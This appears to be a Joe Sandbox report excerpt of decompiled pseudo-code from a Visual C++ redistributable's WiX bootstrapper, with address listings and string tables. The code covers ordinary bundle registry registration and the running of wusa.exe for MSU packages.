																													_t208 = E00051587(_t202, _t205, _v8, L"ModifyPath", L"\"%ls\" /modify",  *((intOrPtr*)(_t207 + 0x54)));
																													_t210 = _t210 + 0x10;
																													__eflags = _t208;
																													if(_t208 >= 0) {
																														_t208 = E00051344(_v8, L"NoElevateOnModify", 1);
																														__eflags = _t208;
																														if(_t208 >= 0) {
																															goto L60;
																														} else {
																															_push(L"NoElevateOnModify");
																															goto L86;
																														}
																													} else {
																														_push(L"ModifyPath");
																														goto L86;
																													}
																												}
																											} else {
																												_t208 = E00051344(_v8, L"NoModify", _t164);
																												__eflags = _t208;
																												if(_t208 >= 0) {
																													L60:
																													__eflags =  *(_t207 + 0x8c);
																													if( *(_t207 + 0x8c) == 0) {
																														L63:
																														__eflags =  *(_t207 + 4);
																														if( *(_t207 + 4) != 0) {
																															L66:
																															_t208 = E00051587(_t202, _t205, _v8, L"QuietUninstallString", L"\"%ls\" /uninstall /quiet",  *((intOrPtr*)(_t207 + 0x54)));
																															_t210 = _t210 + 0x10;
																															__eflags = _t208;
																															if(_t208 >= 0) {
																																__eflags =  *((intOrPtr*)(_t207 + 0x88)) - 2;
																																_t197 = L" /uninstall";
																																_t167 =  !=  ? L" /uninstall" : L"/modify";
																																_push( !=  ? L" /uninstall" : L"/modify");
																																_t208 = E00051587(L" /uninstall", _t205, _v8, L"UninstallString", L"\"%ls\" %ls",  *((intOrPtr*)(_t207 + 0x54)));
																																_t210 = _t210 + 0x14;
																																__eflags = _t208;
																																if(_t208 >= 0) {
																																	__eflags =  *(_t207 + 0x98);
																																	if( *(_t207 + 0x98) == 0) {
																																		L73:
																																		__eflags =  *(_t207 + 0x9c);
																																		if( *(_t207 + 0x9c) == 0) {
																																			goto L76;
																																		} else {
																																			_t208 = E0001F410(_t197, _t205, _t207, _t196);
																																			__eflags = _t208;
																																			if(_t208 >= 0) {
																																				goto L76;
																																			} else {
																																				_push("Failed to write update registration.");
																																				goto L92;
																																			}
																																		}
																																	} else {
																																		_t105 = _t207 + 0x94; // 0x94
																																		_t208 = E0001F2DC(_t196, _t196, _t105);
																																		__eflags = _t208;
																																		if(_t208 >= 0) {
																																			goto L73;
																																		} else {
																																			_push("Failed to write software tags.");
																																			L92:
																																			_push(_t208);
																																			E0005012F();
																																		}
																																	}
																																} else {
																																	_push(L"UninstallString");
																																	goto L86;
																																}
																															} else {
																																_push(L"QuietUninstallString");
																																goto L86;
																															}
																														} else {
																															_t208 = E00051344(_v8, L"SystemComponent", 1);
																															__eflags = _t208;
																															if(_t208 >= 0) {
																																goto L66;
																															} else {
																																_push(L"SystemComponent");
																																goto L86;
																															}
																														}
																													} else {
																														_t208 = E00051344(_v8, L"NoRemove",  *((intOrPtr*)(_t207 + 0x90)));
																														__eflags = _t208;
																														if(_t208 >= 0) {
																															goto L63;
																														} else {
																															_push(L"NoRemove");
																															goto L86;
																														}
																													}
																												} else {
																													_push(L"NoModify");
																													goto L86;
																												}
																											}
																										} else {
																											_t208 = E00051392(_t202, _t205, _v8, L"Contact", _t163);
																											__eflags = _t208;
																											if(_t208 >= 0) {
																												goto L52;
																											} else {
																												_push(L"Contact");
																												goto L86;
																											}
																										}
																									} else {
																										_t208 = E00051392(_t202, _t205, _v8, L"Comments", _t162);
																										__eflags = _t208;
																										if(_t208 >= 0) {
																											goto L49;
																										} else {
																											_push(L"Comments");
																											goto L86;
																										}
																									}
																								} else {
																									_t208 = E00051392(_t202, _t205, _v8, L"ParentDisplayName",  *(_t207 + 0x7c));
																									__eflags = _t208;
																									if(_t208 >= 0) {
																										_t208 = E00051392(_t202, _t205, _v8, L"ParentKeyName",  *(_t207 + 0x7c));
																										__eflags = _t208;
																										if(_t208 >= 0) {
																											goto L46;
																										} else {
																											_push(L"ParentKeyName");
																											goto L86;
																										}
																									} else {
																										_push(L"ParentDisplayName");
																										goto L86;
																									}
																								}
																							} else {
																								_t208 = E00051392(_t202, _t205, _v8, L"URLUpdateInfo",  *(_t207 + 0x78));
																								__eflags = _t208;
																								if(_t208 >= 0) {
																									goto L41;
																								} else {
																									_push(L"URLUpdateInfo");
																									goto L86;
																								}
																							}
																						} else {
																							_t208 = E00051392(_t202, _t205, _v8, L"URLInfoAbout",  *(_t207 + 0x74));
																							__eflags = _t208;
																							if(_t208 >= 0) {
																								goto L38;
																							} else {
																								_push(L"URLInfoAbout");
																								goto L86;
																							}
																						}
																					} else {
																						_t208 = E00051392(_t202, _t205, _v8, L"HelpTelephone",  *(_t207 + 0x70));
																						__eflags = _t208;
																						if(_t208 >= 0) {
																							goto L35;
																						} else {
																							_push(L"HelpTelephone");
																							goto L86;
																						}
																					}
																				} else {
																					_t208 = E00051392(_t202, _t205, _v8, L"HelpLink",  *(_t207 + 0x6c));
																					__eflags = _t208;
																					if(_t208 >= 0) {
																						goto L32;
																					} else {
																						_push(L"HelpLink");
																						goto L86;
																					}
																				}
																			} else {
																				_push(L"Publisher");
																				goto L86;
																			}
																		} else {
																			_t208 = E00051392(_t202, _t205, _v8, L"DisplayVersion",  *(_t207 + 0x64));
																			__eflags = _t208;
																			if(_t208 >= 0) {
																				goto L25;
																			} else {
																				_push(L"DisplayVersion");
																				goto L86;
																			}
																		}
																	} else {
																		_push(L"DisplayName");
																		L86:
																		_push("Failed to write %ls value.");
																		_push(_t208);
																		E0005012F();
																	}
																}
															}
														} else {
															_t195 = L"BundleTag";
															_t208 = E00051392(_t202, _t205, _v8, _t195,  *(_t207 + 0x14));
															__eflags = _t208;
															if(_t208 < 0) {
																goto L85;
															} else {
																goto L16;
															}
														}
													} else {
														_t195 = L"BundleProviderKey";
														_t208 = E00051392(_t202, _t205, _v8, _t195,  *(_t207 + 0x44));
														__eflags = _t208;
														if(_t208 < 0) {
															goto L85;
														} else {
															goto L14;
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						_push("Failed to create registration key.");
						_push(_t208);
						E0005012F();
					}
				} else {
					_t208 = E00029AD2(_t197, __edx, _t207,  *_t207,  *((intOrPtr*)(_t207 + 0x48)),  *((intOrPtr*)(_t207 + 0x10)), _a16 + 4, _a4);
					if(_t208 >= 0) {
						goto L3;
					} else {
						E0005012F(_t208, "Failed to cache bundle from path: %ls", _a4);
					}
				}
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				if(_v16 != 0) {
					E000554EF(_v16);
				}
				if(_v8 != 0) {
					RegCloseKey(_v8);
				}
				return _t208;
			}



























                                                                          0x0001fe26
                                                                          0x0001fe26
                                                                          0x0001fe26
                                                                          0x0001fe2c
                                                                          0x0001fe30
                                                                          0x0001fe34
                                                                          0x0001fe3a
                                                                          0x0001fe45
                                                                          0x0001fe46
                                                                          0x0001fe53
                                                                          0x0001fe58
                                                                          0x0001fe5f
                                                                          0x0001fe94
                                                                          0x0001fea8
                                                                          0x0001feaa
                                                                          0x0001feac
                                                                          0x0001fec0
                                                                          0x0001fec4
                                                                          0x0001fec5
                                                                          0x00020358
                                                                          0x00020358
                                                                          0x0002035c
                                                                          0x000203aa
                                                                          0x000203aa
                                                                          0x000203ae
                                                                          0x000203c3
                                                                          0x000203d0
                                                                          0x000203d2
                                                                          0x000203d4
                                                                          0x000203d6
                                                                          0x00000000
                                                                          0x000203d6
                                                                          0x000203b0
                                                                          0x000203b6
                                                                          0x000203b8
                                                                          0x000203ba
                                                                          0x00000000
                                                                          0x000203bc
                                                                          0x000203bc
                                                                          0x00000000
                                                                          0x000203bc
                                                                          0x000203ba
                                                                          0x0002035e
                                                                          0x00020361
                                                                          0x00020364
                                                                          0x00020368
                                                                          0x0002036b
                                                                          0x0002036d
                                                                          0x00000000
                                                                          0x0002036f
                                                                          0x0002036f
                                                                          0x00020379
                                                                          0x0002037b
                                                                          0x0002037c
                                                                          0x0002037e
                                                                          0x00020380
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00020380
                                                                          0x00000000
                                                                          0x00020371
                                                                          0x00020371
                                                                          0x00020373
                                                                          0x00000000
                                                                          0x00020375
                                                                          0x00020375
                                                                          0x00020377
                                                                          0x00020382
                                                                          0x00020382
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00020384
                                                                          0x00020385
                                                                          0x00020393
                                                                          0x00020395
                                                                          0x00020397
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00020397
                                                                          0x00020373
                                                                          0x0002036f
                                                                          0x0002036d
                                                                          0x0001fecb
                                                                          0x0001fece
                                                                          0x0001fedc
                                                                          0x0001fede
                                                                          0x0001fee0
                                                                          0x00020399
                                                                          0x00020399
                                                                          0x00000000
                                                                          0x0001fee6
                                                                          0x0001fee9
                                                                          0x0001fefa
                                                                          0x0001fefc
                                                                          0x0001fefe
                                                                          0x00000000
                                                                          0x0001ff04
                                                                          0x0001ff07
                                                                          0x0001ff18
                                                                          0x0001ff1a
                                                                          0x0001ff1c
                                                                          0x00000000
                                                                          0x0001ff22
                                                                          0x0001ff25
                                                                          0x0001ff36
                                                                          0x0001ff38
                                                                          0x0001ff3a
                                                                          0x00000000
                                                                          0x0001ff40
                                                                          0x0001ff43
                                                                          0x0001ff54
                                                                          0x0001ff56
                                                                          0x0001ff58
                                                                          0x00000000
                                                                          0x0001ff5e
                                                                          0x0001ff5e
                                                                          0x0001ff61
                                                                          0x0001ff66
                                                                          0x0001ff6c
                                                                          0x0001ff6d
                                                                          0x0001ff6f
                                                                          0x0001ff72
                                                                          0x0001ff7c
                                                                          0x0001ff80
                                                                          0x0001ff81
                                                                          0x0001ff93
                                                                          0x0001ff95
                                                                          0x0001ff98
                                                                          0x0001ff9a
                                                                          0x00000000
                                                                          0x0001ffa0
                                                                          0x0001ffa0
                                                                          0x0001ffa4
                                                                          0x0001ffc1
                                                                          0x0001ffc1
                                                                          0x0001ffc5
                                                                          0x0001ffe2
                                                                          0x0001ffec
                                                                          0x0001fffa
                                                                          0x0001fffc
                                                                          0x0001ffff
                                                                          0x00020001
                                                                          0x00000000
                                                                          0x00020007
                                                                          0x0002000a
                                                                          0x0002001d
                                                                          0x0002001f
                                                                          0x00020022
                                                                          0x00020024
                                                                          0x00000000
                                                                          0x0002002a
                                                                          0x0002002a
                                                                          0x00020033
                                                                          0x00020038
                                                                          0x0002003a
                                                                          0x0002003d
                                                                          0x0002003f
                                                                          0x0002003f
                                                                          0x00020050
                                                                          0x00020052
                                                                          0x00020054
                                                                          0x00020060
                                                                          0x00020064
                                                                          0x00020086
                                                                          0x0002008c
                                                                          0x00020091
                                                                          0x00020093
                                                                          0x00020096
                                                                          0x00020098
                                                                          0x00020098
                                                                          0x000200a9
                                                                          0x000200ab
                                                                          0x000200ad
                                                                          0x000200b9
                                                                          0x000200bd
                                                                          0x000200df
                                                                          0x000200df
                                                                          0x000200e3
                                                                          0x00020105
                                                                          0x00020105
                                                                          0x00020109
                                                                          0x0002012b
                                                                          0x0002012b
                                                                          0x0002012f
                                                                          0x00020151
                                                                          0x00020151
                                                                          0x00020155
                                                                          0x00020197
                                                                          0x00020197
                                                                          0x0002019d
                                                                          0x0002019f
                                                                          0x000201bf
                                                                          0x000201bf
                                                                          0x000201c5
                                                                          0x000201c7
                                                                          0x000201e7
                                                                          0x000201e7
                                                                          0x000201ed
                                                                          0x000201f0
                                                                          0x00020210
                                                                          0x00020213
                                                                          0x00000000
                                                                          0x00020215
                                                                          0x0002022a
                                                                          0x0002022c
                                                                          0x0002022f
                                                                          0x00020231
                                                                          0x0002024c
                                                                          0x0002024e
                                                                          0x00020250
                                                                          0x00000000
                                                                          0x00020252
                                                                          0x00020252
                                                                          0x00000000
                                                                          0x00020252
                                                                          0x00020233
                                                                          0x00020233
                                                                          0x00000000
                                                                          0x00020233
                                                                          0x00020231
                                                                          0x000201f2
                                                                          0x00020200
                                                                          0x00020202
                                                                          0x00020204
                                                                          0x0002025c
                                                                          0x0002025c
                                                                          0x00020263
                                                                          0x00020288
                                                                          0x00020288
                                                                          0x0002028c
                                                                          0x000202ad
                                                                          0x000202c2
                                                                          0x000202c4
                                                                          0x000202c7
                                                                          0x000202c9
                                                                          0x000202d5
                                                                          0x000202dc
                                                                          0x000202e6
                                                                          0x000202e9
                                                                          0x000202ff
                                                                          0x00020301
                                                                          0x00020304
                                                                          0x00020306
                                                                          0x00020312
                                                                          0x00020319
                                                                          0x00020338
                                                                          0x00020338
                                                                          0x0002033f
                                                                          0x00000000
                                                                          0x00020341
                                                                          0x00020348
                                                                          0x0002034a
                                                                          0x0002034c
                                                                          0x00000000
                                                                          0x0002034e
                                                                          0x0002034e
                                                                          0x00000000
                                                                          0x0002034e
                                                                          0x0002034c
                                                                          0x0002031b
                                                                          0x0002031b
                                                                          0x00020328
                                                                          0x0002032a
                                                                          0x0002032c
                                                                          0x00000000
                                                                          0x0002032e
                                                                          0x0002032e
                                                                          0x000203db
                                                                          0x000203db
                                                                          0x000203dc
                                                                          0x000203e2
                                                                          0x0002032c
                                                                          0x00020308
                                                                          0x00020308
                                                                          0x00000000
                                                                          0x00020308
                                                                          0x000202cb
                                                                          0x000202cb
                                                                          0x00000000
                                                                          0x000202cb
                                                                          0x0002028e
                                                                          0x0002029d
                                                                          0x0002029f
                                                                          0x000202a1
                                                                          0x00000000
                                                                          0x000202a3
                                                                          0x000202a3
                                                                          0x00000000
                                                                          0x000202a3
                                                                          0x000202a1
                                                                          0x00020265
                                                                          0x00020278
                                                                          0x0002027a
                                                                          0x0002027c
                                                                          0x00000000
                                                                          0x0002027e
                                                                          0x0002027e
                                                                          0x00000000
                                                                          0x0002027e
                                                                          0x0002027c
                                                                          0x00020206
                                                                          0x00020206
                                                                          0x00000000
                                                                          0x00020206
                                                                          0x00020204
                                                                          0x000201c9
                                                                          0x000201d7
                                                                          0x000201d9
                                                                          0x000201db
                                                                          0x00000000
                                                                          0x000201dd
                                                                          0x000201dd
                                                                          0x00000000
                                                                          0x000201dd
                                                                          0x000201db
                                                                          0x000201a1
                                                                          0x000201af
                                                                          0x000201b1
                                                                          0x000201b3
                                                                          0x00000000
                                                                          0x000201b5
                                                                          0x000201b5
                                                                          0x00000000
                                                                          0x000201b5
                                                                          0x000201b3
                                                                          0x00020157
                                                                          0x00020167
                                                                          0x00020169
                                                                          0x0002016b
                                                                          0x00020187
                                                                          0x00020189
                                                                          0x0002018b
                                                                          0x00000000
                                                                          0x0002018d
                                                                          0x0002018d
                                                                          0x00000000
                                                                          0x0002018d
                                                                          0x0002016d
                                                                          0x0002016d
                                                                          0x00000000
                                                                          0x0002016d
                                                                          0x0002016b
                                                                          0x00020131
                                                                          0x00020141
                                                                          0x00020143
                                                                          0x00020145
                                                                          0x00000000
                                                                          0x00020147
                                                                          0x00020147
                                                                          0x00000000
                                                                          0x00020147
                                                                          0x00020145
                                                                          0x0002010b
                                                                          0x0002011b
                                                                          0x0002011d
                                                                          0x0002011f
                                                                          0x00000000
                                                                          0x00020121
                                                                          0x00020121
                                                                          0x00000000
                                                                          0x00020121
                                                                          0x0002011f
                                                                          0x000200e5
                                                                          0x000200f5
                                                                          0x000200f7
                                                                          0x000200f9
                                                                          0x00000000
                                                                          0x000200fb
                                                                          0x000200fb
                                                                          0x00000000
                                                                          0x000200fb
                                                                          0x000200f9
                                                                          0x000200bf
                                                                          0x000200cf
                                                                          0x000200d1
                                                                          0x000200d3
                                                                          0x00000000
                                                                          0x000200d5
                                                                          0x000200d5
                                                                          0x00000000
                                                                          0x000200d5
                                                                          0x000200d3
                                                                          0x000200af
                                                                          0x000200af
                                                                          0x00000000
                                                                          0x000200af
                                                                          0x00020066
                                                                          0x00020076
                                                                          0x00020078
                                                                          0x0002007a
                                                                          0x00000000
                                                                          0x0002007c
                                                                          0x0002007c
                                                                          0x00000000
                                                                          0x0002007c
                                                                          0x0002007a
                                                                          0x00020056
                                                                          0x00020056
                                                                          0x0002039a
                                                                          0x0002039a
                                                                          0x0002039f
                                                                          0x000203a0
                                                                          0x000203a5
                                                                          0x00020054
                                                                          0x00020024
                                                                          0x0001ffc7
                                                                          0x0001ffca
                                                                          0x0001ffd8
                                                                          0x0001ffda
                                                                          0x0001ffdc
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ffdc
                                                                          0x0001ffa6
                                                                          0x0001ffa9
                                                                          0x0001ffb7
                                                                          0x0001ffb9
                                                                          0x0001ffbb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x0001ffbb
                                                                          0x0001ffa4
                                                                          0x0001ff9a
                                                                          0x0001ff58
                                                                          0x0001ff3a
                                                                          0x0001ff1c
                                                                          0x0001fefe
                                                                          0x0001fee0
                                                                          0x0001feae
                                                                          0x0001feae
                                                                          0x0001feb3
                                                                          0x0001feb4
                                                                          0x0001feba
                                                                          0x0001fe61
                                                                          0x0001fe78
                                                                          0x0001fe7c
                                                                          0x00000000
                                                                          0x0001fe7e
                                                                          0x0001fe87
                                                                          0x0001fe8c
                                                                          0x0001fe7c
                                                                          0x000203e8
                                                                          0x000203ed
                                                                          0x000203ed
                                                                          0x000203f6
                                                                          0x000203fb
                                                                          0x000203fb
                                                                          0x00020404
                                                                          0x00020409
                                                                          0x00020409
                                                                          0x00020416

                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000,?,?,?), ref: 00020409
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.10.4.4718$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$userVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString
                                                                          • API String ID: 3535843008-3978993339
                                                                          • Opcode ID: 05b3e84db506a6779c65837778f88e2a994e10e13fad73fab37f5ce59157f429
                                                                          • Instruction ID: ab97002e4379d280ffe40471d68506d802655884cef911ef35a9b9292df56712
                                                                          • Opcode Fuzzy Hash: 05b3e84db506a6779c65837778f88e2a994e10e13fad73fab37f5ce59157f429
                                                                          • Instruction Fuzzy Hash: C2F1DA31A80B36FBDB229654DD42BEF76AABF00711F144651FD00BA653D7B2AE6097C0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00036A85 Relevance: 59.9, APIs: 7, Strings: 27, Instructions: 377COMMON
                                                                          Download Yara Rule
                                                                          C-Code - Quality: 64%
                                                                          			E00036A85(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
				struct _SECURITY_ATTRIBUTES* _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				char _v16;
				char _v20;
				char _v24;
				long _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				struct _PROCESS_INFORMATION _v60;
				intOrPtr _v68;
				intOrPtr _v72;
				char _v76;
				struct _STARTUPINFOW _v144;
				void* __edi;
				void* _t111;
				void* _t114;
				intOrPtr* _t115;
				intOrPtr _t116;
				void* _t128;
				struct _SECURITY_ATTRIBUTES* _t147;
				void* _t148;
				void* _t149;
				void* _t150;
				signed short _t152;
				signed short _t157;
				struct _SECURITY_ATTRIBUTES* _t189;
				void* _t202;
				intOrPtr* _t205;
				void* _t206;
				intOrPtr _t208;
				void* _t211;
				void* _t212;
				void* _t213;

				_t199 = __ecx;
				_v16 = 0;
				_v20 = 0;
				_v32 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v44 = 0;
				_v40 = 0;
				E0003F670(_t202,  &_v144, 0, 0x44);
				_v28 = 0;
				_v36 = 0;
				asm("stosd");
				_t212 = _t211 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(E000509BB(_t199, GetCurrentProcess(),  &_v36) >= 0) {
					_t205 = _a28;
					 *_t205 = 0;
					if(_v36 == 0) {
						if(E000134C5(_t199, _t205, 0x25,  &_v24) >= 0) {
							goto L10;
						} else {
							_push("Failed to find System32 directory.");
							goto L2;
						}
					} else {
						_t189 = E000134C5(_t199, _t205, 0x24,  &_v32);
						if(_t189 >= 0) {
							_t189 = E00012D79(_t199, _v32, L"SysNative\\",  &_v24);
							if(_t189 >= 0) {
								L10:
								if(E00012D79(_t199, _v24, L"wusa.exe",  &_v8) >= 0) {
									_t208 = _a4;
									_t111 =  *((intOrPtr*)(_t208 + 0x10)) - 1;
									if(_t111 == 0) {
										_push( *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)) + 0x94)));
										_t114 = E00011F20( &_v12, L"\"%ls\" /uninstall /kb:%ls /quiet /norestart", _v8);
										_t213 = _t212 + 0x10;
										if(_t114 >= 0) {
											goto L23;
										} else {
											_push("Failed to format MSU uninstall command.");
											goto L2;
										}
									} else {
										if(_t111 == 1) {
											_t189 = E0002A189(_t199, 1,  *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)) + 0x24)),  &_v16);
											if(_t189 >= 0) {
												E00018197(_a8, L"WixBundleExecutePackageCacheFolder", _v16, 1);
												_t189 = E00012D79(_t199, _v16,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)) + 0x7c)))) + 0x18)),  &_v20);
												if(_t189 >= 0) {
													_push(_v20);
													_t189 = E00011F20( &_v12, L"\"%ls\" \"%ls\" /quiet /norestart", _v8);
													_t213 = _t212 + 0x10;
													if(_t189 >= 0) {
														L23:
														_t115 =  *((intOrPtr*)(_t208 + 0xc));
														if(_t115 == 0) {
															L29:
															_t116 = _v20;
															if(_t116 == 0) {
																_t116 =  *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)) + 0x94));
															}
															_push(_v12);
															_push(_t116);
															_push(E00023BB0( *((intOrPtr*)(_t208 + 0x10))));
															_push( *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)))));
															E0001550F(2, 0x2000012d, E000242A2(_a12));
															_t212 = _t213 + 0x1c;
															if(E0003678F(_a16,  &_v44,  &_v40) >= 0) {
																_v144.cb = 0x44;
																if(CreateProcessW(_v8, _v12, 0, 0, 0, 0x8000000, 0, 0,  &_v144,  &_v60) != 0) {
																	while(1) {
																		_v76 = 2;
																		_v68 = 0x32;
																		_v72 = 1;
																		_t128 = _a20( &_v76, _a24);
																		if(_t128 != 1 && _t128 != 0) {
																			break;
																		}
																		_t189 = E00050917(_t199, _v60.hProcess, 0x1f4,  &_v28);
																		if(_t189 == 0x80070102) {
																			continue;
																		} else {
																			if(_t189 < 0) {
																				_push(_v8);
																				_push("Failed to wait for executable to complete: %ls");
																				goto L51;
																			} else {
																				if(GetExitCodeProcess(_v60.hProcess,  &_v28) != 0) {
																					_t189 =  ==  ? 0xbc2 : _v28;
																					_v28 = _t189;
																					_t147 = _t189;
																					if(_t147 == 0) {
																						L49:
																						_t189 = 0;
																					} else {
																						_t148 = _t147 - 1;
																						if(_t148 == 0) {
																							goto L49;
																						} else {
																							_t149 = _t148 - 0xbc1;
																							if(_t149 == 0) {
																								L48:
																								 *_t205 = 1;
																								goto L49;
																							} else {
																								_t150 = _t149 - 0x23f443;
																								if(_t150 == 0) {
																									goto L48;
																								} else {
																									if(_t150 == 1) {
																										goto L49;
																									} else {
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t152 = GetLastError();
																					_t193 =  <=  ? _t152 : _t152 & 0x0000ffff | 0x80070000;
																					_t189 =  >=  ? 0x80004005 :  <=  ? _t152 : _t152 & 0x0000ffff | 0x80070000;
																					E000137D3(0x80004005, "msuengine.cpp", 0x177, _t189);
																					_push("Failed to get process exit code.");
																					goto L2;
																				}
																			}
																		}
																		goto L52;
																	}
																	_t189 = (0 | _t128 != 0x00000002) + 0x80070642;
																	E000137D3(_t128, "msuengine.cpp", 0x16a, _t189);
																	_push("Bootstrapper application aborted during MSU progress.");
																	goto L2;
																} else {
																	_t157 = GetLastError();
																	_t198 =  <=  ? _t157 : _t157 & 0x0000ffff | 0x80070000;
																	_t189 =  >=  ? 0x80004005 :  <=  ? _t157 : _t157 & 0x0000ffff | 0x80070000;
																	E000137D3(0x80004005, "msuengine.cpp", 0x160, _t189);
																	_push(_v8);
																	_push("Failed to CreateProcess on path: %ls");
																	goto L51;
																}
															} else {
																_push("Failed to ensure WU service was enabled to install MSU package.");
																goto L2;
															}
														} else {
															_t199 = 0;
															if( *_t115 == 0) {
																goto L29;
															} else {
																_t189 = E00011EF2( &_v12, L" /log:", 0);
																if(_t189 >= 0) {
																	_t189 = E00011EF2( &_v12,  *((intOrPtr*)(_t208 + 0xc)), 0);
																	if(_t189 >= 0) {
																		goto L29;
																	} else {
																		_push("Failed to append log path to MSU command-line.");
																		goto L2;
																	}
																} else {
																	_push("Failed to append log switch to MSU command-line.");
																	goto L2;
																}
															}
														}
													} else {
														_push("Failed to format MSU install command.");
														goto L2;
													}
												} else {
													_push("Failed to build MSU path.");
													goto L2;
												}
											} else {
												_push( *((intOrPtr*)( *((intOrPtr*)(_t208 + 8)))));
												_push("Failed to get cached path for package: %ls");
												L51:
												_push(_t189);
												E0005012F();
											}
										} else {
											_t189 = 0x8000ffff;
											_push("Failed to get action arguments for MSU package.");
											goto L2;
										}
									}
								} else {
									_push("Failed to allocate WUSA.exe path.");
									goto L2;
								}
							} else {
								_push("Failed to append SysNative directory.");
								goto L2;
							}
						} else {
							_push("Failed to find Windows directory.");
							goto L2;
						}
					}
				} else {
					_push("Failed to determine WOW64 status.");
					L2:
					_push(_t189);
					E0005012F();
				}
				L52:
				if(_v16 != 0) {
					E000554EF(_v16);
				}
				if(_v20 != 0) {
					E000554EF(_v20);
				}
				if(_v24 != 0) {
					E000554EF(_v24);
				}
				if(_v32 != 0) {
					E000554EF(_v32);
				}
				if(_v8 != 0) {
					E000554EF(_v8);
				}
				if(_v12 != 0) {
					E000554EF(_v12);
				}
				if(_v60.hProcess == 0) {
					_t206 = 0;
				} else {
					CloseHandle(_v60.hProcess);
					_t206 = 0;
					_v60 = 0;
				}
				if(_v60.hThread != 0) {
					CloseHandle(_v60.hThread);
					_v60.hThread = _t206;
				}
				if(_v40 != 0) {
					E00036945(_v44, 4);
				}
				E00018197(_a8, L"WixBundleExecutePackageCacheFolder", _t206, 1);
				return _t189;
			}






































                                                                          0x00036a85
                                                                          0x00036a9d
                                                                          0x00036aa0
                                                                          0x00036aa3
                                                                          0x00036aa6
                                                                          0x00036aa9
                                                                          0x00036aac
                                                                          0x00036aaf
                                                                          0x00036ab2
                                                                          0x00036ab5
                                                                          0x00036abc
                                                                          0x00036ac2
                                                                          0x00036ac5
                                                                          0x00036ac6
                                                                          0x00036ac9
                                                                          0x00036aca
                                                                          0x00036acb
                                                                          0x00036ad1
                                                                          0x00036ad2
                                                                          0x00036ad3
                                                                          0x00036ad4
                                                                          0x00036ae9
                                                                          0x00036afd
                                                                          0x00036b00
                                                                          0x00036b05
                                                                          0x00036b4c
                                                                          0x00000000
                                                                          0x00036b4e
                                                                          0x00036b4e
                                                                          0x00000000
                                                                          0x00036b4e
                                                                          0x00036b07
                                                                          0x00036b12
                                                                          0x00036b16
                                                                          0x00036b30
                                                                          0x00036b34
                                                                          0x00036b55
                                                                          0x00036b6a
                                                                          0x00036b76
                                                                          0x00036b7c
                                                                          0x00036b7f
                                                                          0x00036c22
                                                                          0x00036c34
                                                                          0x00036c3b
                                                                          0x00036c40
                                                                          0x00000000
                                                                          0x00036c42
                                                                          0x00036c42
                                                                          0x00000000
                                                                          0x00036c42
                                                                          0x00036b85
                                                                          0x00036b88
                                                                          0x00036baa
                                                                          0x00036bae
                                                                          0x00036bcc
                                                                          0x00036be8
                                                                          0x00036bec
                                                                          0x00036bf8
                                                                          0x00036c0c
                                                                          0x00036c0e
                                                                          0x00036c13
                                                                          0x00036c4c
                                                                          0x00036c4c
                                                                          0x00036c51
                                                                          0x00036c97
                                                                          0x00036c97
                                                                          0x00036c9c
                                                                          0x00036ca1
                                                                          0x00036ca1
                                                                          0x00036ca7
                                                                          0x00036caa
                                                                          0x00036cb3
                                                                          0x00036cb7
                                                                          0x00036cc9
                                                                          0x00036cce
                                                                          0x00036ce5
                                                                          0x00036cf4
                                                                          0x00036d20
                                                                          0x00036d5d
                                                                          0x00036d62
                                                                          0x00036d6c
                                                                          0x00036d75
                                                                          0x00036d78
                                                                          0x00036d7d
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00036d94
                                                                          0x00036d9c
                                                                          0x00000000
                                                                          0x00036d9e
                                                                          0x00036da0
